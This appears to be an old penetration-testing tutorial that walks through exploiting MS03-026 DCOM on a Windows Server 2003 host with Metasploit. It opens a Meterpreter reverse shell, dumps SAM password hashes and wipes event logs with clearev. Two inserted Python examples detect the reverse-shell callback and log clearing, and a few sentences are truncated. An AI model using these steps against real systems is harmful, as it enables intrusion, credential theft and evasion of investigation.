Penetration Testing With The Metasploit Framework

23/08/2011 10:13


When you think "penetration testing tool", the first thing that comes to mind is the Ruby world's largest project, with more than 700,000 lines of code: Metasploit. No wonder it has become the de facto standard for penetration testing and vulnerability development, with more than one million unique downloads per year and the world's largest database of quality-assured public
The Metasploit Framework is a program and sub-project developed by Metasploit LLC. It was originally written in 2003 in the Perl programming language, but was later completely rewritten in Ruby. With the most recent release (3.7.1), Metasploit has taken the testing and simulation of exploits to the next level, muscling out its high-priced commercial counterparts by speeding up the development and use of exploit code in the shortest possible time.

Working with Metasploit

Metasploit is easy to use and was designed with ease of use in mind to support the penetration tester. I'll take you through this on BackTrack 5, so download it if you haven't already done so (org / downloads /). The reason for using BackTrack 5 is that it ships with the right Ruby libraries.

The Metasploit Framework has three working environments: the msfconsole, the msfcli interface and the msfweb interface. However, the main and most favoured workspace is the msfconsole. It is a powerful command line interface with its own set of commands and environment.

Before you start using it, it is useful to understand what some of the Metasploit commands do. Some of the most commonly used commands are listed below; screenshots describing their output are provided as we use them against some of the boxes in the next part of this article.

i) search <keyword>: Typing the "search" command with a keyword lists the various exploits that match that keyword.

ii) show exploits: Typing "show exploits" at the prompt lists the exploits currently available. These cover different remote platforms and applications, including Windows, Linux, IIS, Apache, etc., which lets you test the framework's flexibility and understand how

iii) show payloads: With the same "show" command, you can also list the available payloads. We can use "show payloads" to get the list of payloads.

iv) show options: Typing the "show options" command displays the options you have set and perhaps those you may have forgotten to specify. Each exploit and payload comes with its own options that can be set.

v) info <type> <name>: If you want specific information about an exploit or payload, you can use the "info" command. Let's say we want full info on the payload "winbind". We can use "info payload winbind".

vi) use <exploit_name>: This command tells Metasploit to use the exploit with the specified name.

vii) set RHOST <hostname_or_ip>: This command tells Metasploit which remote host to target.

viii) set RPORT <host_port>: This command specifies the port on the remote host that Metasploit will connect to.

ix) set PAYLOAD <generic/shell_bind_tcp>: This command sets the payload that is used to give you a shell on the target when the service is exploited.

x) set LPORT <local_port>: This command sets the port number the payload opens on the server when the exploit is executed. It is important that this port can be opened on the server (i.e. it is not used by another service and is not reserved for administrative purposes), so set it to a random 4-digit number above 1024 and you should be fine. You'll also have to change the number each time you successfully exploit a service.

xi) exploit: Actually exploits the service. Another version of the exploit command, rexploit, reloads your exploit code and then runs it. This lets you experiment with small changes to the exploit code without having to restart the console.

xii) help: The "help" command gives basic information on all the commands not listed here.

Now that you are comfortable with the basic commands, let's pick a couple of scenarios for remotely controlling a machine.


Victim's machine:

Operating System: Microsoft Windows Server 2003

Attacker's (our) machine:

OS: BackTrack 5

Kernel version: Linux 2.6.38 #1 SMP BT Thu Mar 17 20:52:18 EDT 2011 i686 GNU/Linux

Metasploit version: built-in Metasploit 3.8.0-dev




Objective:

The only information we have about the remote server is that it runs Windows Server 2003, and the aim is to get shell access to the server.

The detailed steps:

Step 1:

Run an nmap scan against the remote server. Starting an nmap scan will show us the range of open ports.

Step 2:

In your copy of BackTrack, go to: Applications - BackTrack - Exploitation Tools - Network Exploitation Tools - Metasploit Framework - msfconsole. During initialization, msfconsole performs its standard checks. If all goes well, the console starts up.

Step 3:

Now that we know port 135 is open, we search for an RPC-related exploit in Metasploit. To list all the exploits Metasploit supports, use the "show exploits" command. This shows all the currently available exploits.

As you may have noticed, the default installation of Metasploit Framework 3.8.0-dev comes with 696 exploits and 224 payloads, which is quite an impressive arsenal; finding a particular exploit in this huge list would be a task of daunting proportions.

So we use the better option: the "search <keyword>" command, which makes Metasploit search for exploits related to RPC. In msfconsole, type "search dcerpc" to find all exploits related to the DCERPC keyword that can be used to gain access to a vulnerable server on port 135. A list of all the matching exploits appears in the msfconsole window.

Step 4:

Now that the list of RPC exploits is in front of you, we need more information about the vulnerability before actually using it. For more information about an exploit, use the "info" command with the exploit's name (here the DCOM exploit, ms03_026_dcom). It provides information such as the available targets, usage requirements, details of the vulnerability itself, and references where you can find more.

Step 5:

The "use <exploit_name>" command activates the exploit environment for the exploit <exploit_name>. In our case, we run "use" with the name of the DCOM exploit. The prompt changes from "msf>" to "msf exploit(ms03_026_dcom)>", which signals that we have entered a temporary exploit environment.

Step 6:

Now that we have chosen the exploit to use for the situation at hand, the "show options" command shows the different parameters required for the exploit to function properly. In our case, RPORT is already set to 135 and the only option left to set is RHOST, which you can set with the "set RHOST" command. We issue the "set RHOST" command and confirm that RHOST is now set.

Step 7:

The only step left now, before we launch the exploit, is to set a payload for it to use. We can look at all the available payloads with the "show payloads" command.

In this case, we use the reverse TCP Meterpreter, which can be set with the command "set PAYLOAD windows/meterpreter/reverse_tcp"; it spawns a shell if the remote server is successfully exploited. Now, once again, we need to display the available options using "show options" to ensure that all the mandatory fields are filled in properly, so that the exploit launches correctly.

We note that the payload's LHOST has not been set, so we set it to our local IP with the "set LHOST" command.


Step 8:

Now that everything is ready and the exploit is properly configured, it is time to launch it.

Use the "check" command to check whether the victim's machine is vulnerable to the exploit or not. This option is not present for all exploits, but it can be a really good support system before you use the exploit against the remote server, ensuring that the server is not patched against the vulnerability you are about to exploit.

In this case, our exploit does not support the check option.

The "exploit" command actually launches the attack, doing whatever it has to do for the payload to be executed on the remote machine.

The exploit executed successfully against the remote machine via the vulnerable port 135. This can be seen from the prompt, which has changed to "meterpreter>".
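From the defender's side, the sequence above leaves a characteristic network footprint: an inbound connection to TCP 135 from some host, followed shortly by an outbound connection from the server back to that same host on a port above 1024 (the reverse_tcp callback to LPORT). The following is an added example, not code from the original article; the log format, addresses and timestamps are constructed for it.

```python
import re
from datetime import datetime

# Constructed sample connection log (not from the original article).  Assumed format:
# "<date> <time> <IN|OUT> <src_ip>:<src_port> -> <dst_ip>:<dst_port>", as recorded at
# the perimeter of the server 10.0.0.20.
SAMPLE_LOG = """\
2011-08-23 10:01:05 IN 10.0.0.5:44120 -> 10.0.0.20:135
2011-08-23 10:01:07 OUT 10.0.0.20:1042 -> 10.0.0.5:4444
2011-08-23 10:02:11 IN 10.0.0.8:51234 -> 10.0.0.20:135
2011-08-23 10:15:00 OUT 10.0.0.20:1045 -> 10.0.0.9:80
2011-08-23 10:30:00 IN 10.0.0.8:51300 -> 10.0.0.20:135
2011-08-23 10:31:30 OUT 10.0.0.20:1050 -> 10.0.0.8:4444
"""

LINE_RE = re.compile(r"^(\S+ \S+) (IN|OUT) (\S+):(\d+) -> (\S+):(\d+)$")

def parse_line(line):
    """Return (timestamp, direction, src, sport, dst, dport), or None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group(1), "%Y-%m-%d %H:%M:%S")
    return ts, m.group(2), m.group(3), int(m.group(4)), m.group(5), int(m.group(6))

def find_reverse_shell_callbacks(log_text, window_seconds=60):
    """Correlate an inbound connection to TCP 135 (the RPC port exploited above) with
    a later outbound connection from the same server back to the same peer on a port
    above 1024 (the LPORT range the article recommends): the reverse_tcp callback.
    Returns a list of (server, peer, callback_port, seconds_after_rpc_contact)."""
    events = [e for e in (parse_line(l) for l in log_text.splitlines()) if e]
    hits = []
    for ts, direction, src, _sport, dst, dport in events:
        if direction != "IN" or dport != 135:
            continue
        server, peer = dst, src
        for ts2, dir2, src2, _sp2, dst2, dport2 in events:
            delta = (ts2 - ts).total_seconds()
            if (dir2 == "OUT" and src2 == server and dst2 == peer
                    and dport2 > 1024 and 0 <= delta <= window_seconds):
                hits.append((server, peer, dport2, int(delta)))
    return hits

if __name__ == "__main__":
    for hit in find_reverse_shell_callbacks(SAMPLE_LOG):
        print("possible reverse shell: %s -> %s:%d, %ds after RPC contact" % hit)
```

With the default 60-second window only the first peer is flagged; the second peer's callback arrives 90 seconds after its RPC contact, so widening the window trades noise for coverage.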

Step 9:

Now that a reverse connection has been set up between the victim and our machine, we have full control of the server. We can use the "help" command to see all the commands available to us on the remote server for performing related actions.

Below is the output of some of the Meterpreter commands:

"ipconfig" displays all of the remote machine's current TCP/IP network settings

"getuid" prints the user ID the server is running as to its console

"hashdump" dumps the contents of the SAM database

"clearev" can be used to remove all traces that have been left behind
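The "clearev" step is itself detectable: Windows records a "log cleared" audit event, and the per-log record counter restarts from 1 after a clear. The following is an added example, not code from the original article; the event IDs are real Windows values, while the record format and the sample records are constructed.

```python
import re

# Real Windows event IDs that record a log being cleared (a fact about Windows, not
# taken from the article): 517 on Windows Server 2003/XP, 1102 (Security log) and
# 104 (System log) on Vista and later.
CLEAR_EVENT_IDS = {517, 1102, 104}

# Constructed sample of forwarded event records (not from the original article), in
# an assumed one-line "Record=<n> EventID=<n> Log=<name> User=<name>" form.
SAMPLE_EVENTS = """\
Record=10412 EventID=528 Log=Security User=DOMAIN\\svc_backup
Record=10413 EventID=592 Log=Security User=NT AUTHORITY\\SYSTEM
Record=1 EventID=517 Log=Security User=NT AUTHORITY\\SYSTEM
Record=2 EventID=528 Log=Security User=Administrator
Record=3011 EventID=6005 Log=System User=N/A
Record=1 EventID=6005 Log=System User=N/A
"""

REC_RE = re.compile(r"^Record=(\d+) EventID=(\d+) Log=(\S+) User=(.+)$")

def parse_events(text):
    """Parse the one-line records into (record_number, event_id, log, user) tuples."""
    out = []
    for line in text.splitlines():
        m = REC_RE.match(line.strip())
        if m:
            out.append((int(m.group(1)), int(m.group(2)), m.group(3), m.group(4)))
    return out

def find_log_clears(text):
    """Flag two signs that an event log was wiped: an explicit 'log cleared' event,
    and a record number that goes backwards within the same log (the counter
    restarts after a clear, so this also catches wipes of logs for which no clear
    event is recorded).  Returns (log, kind, value, user) tuples."""
    findings = []
    last_record = {}
    for rec, event_id, log, user in parse_events(text):
        if event_id in CLEAR_EVENT_IDS:
            findings.append((log, "clear-event", event_id, user))
        prev = last_record.get(log)
        if prev is not None and rec < prev:
            findings.append((log, "record-reset", rec, user))
        last_record[log] = rec
    return findings

if __name__ == "__main__":
    for finding in find_log_clears(SAMPLE_EVENTS):
        print("%s log: %s (%d) attributed to %s" % finding)
```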


We have successfully used Metasploit to break into a remote Windows 2003 Server and obtain a shell from which we can control the remote machine and perform whatever activities we wish.

Potential uses of Metasploit

1) Metasploit can be used in penetration testing to confirm the reports of other automated vulnerability assessment tools, proving that a vulnerability is not a false positive and can actually be exploited. Particular care has to be taken, because it not only refutes false positives but can also break things.

2) Metasploit can be used to test the new exploits that come out almost every day against your own local test servers, to understand the effectiveness of the exploit.

3) Metasploit is also great for testing your intrusion detection systems, to see whether the IDS succeeds in preventing the attacks we throw at it.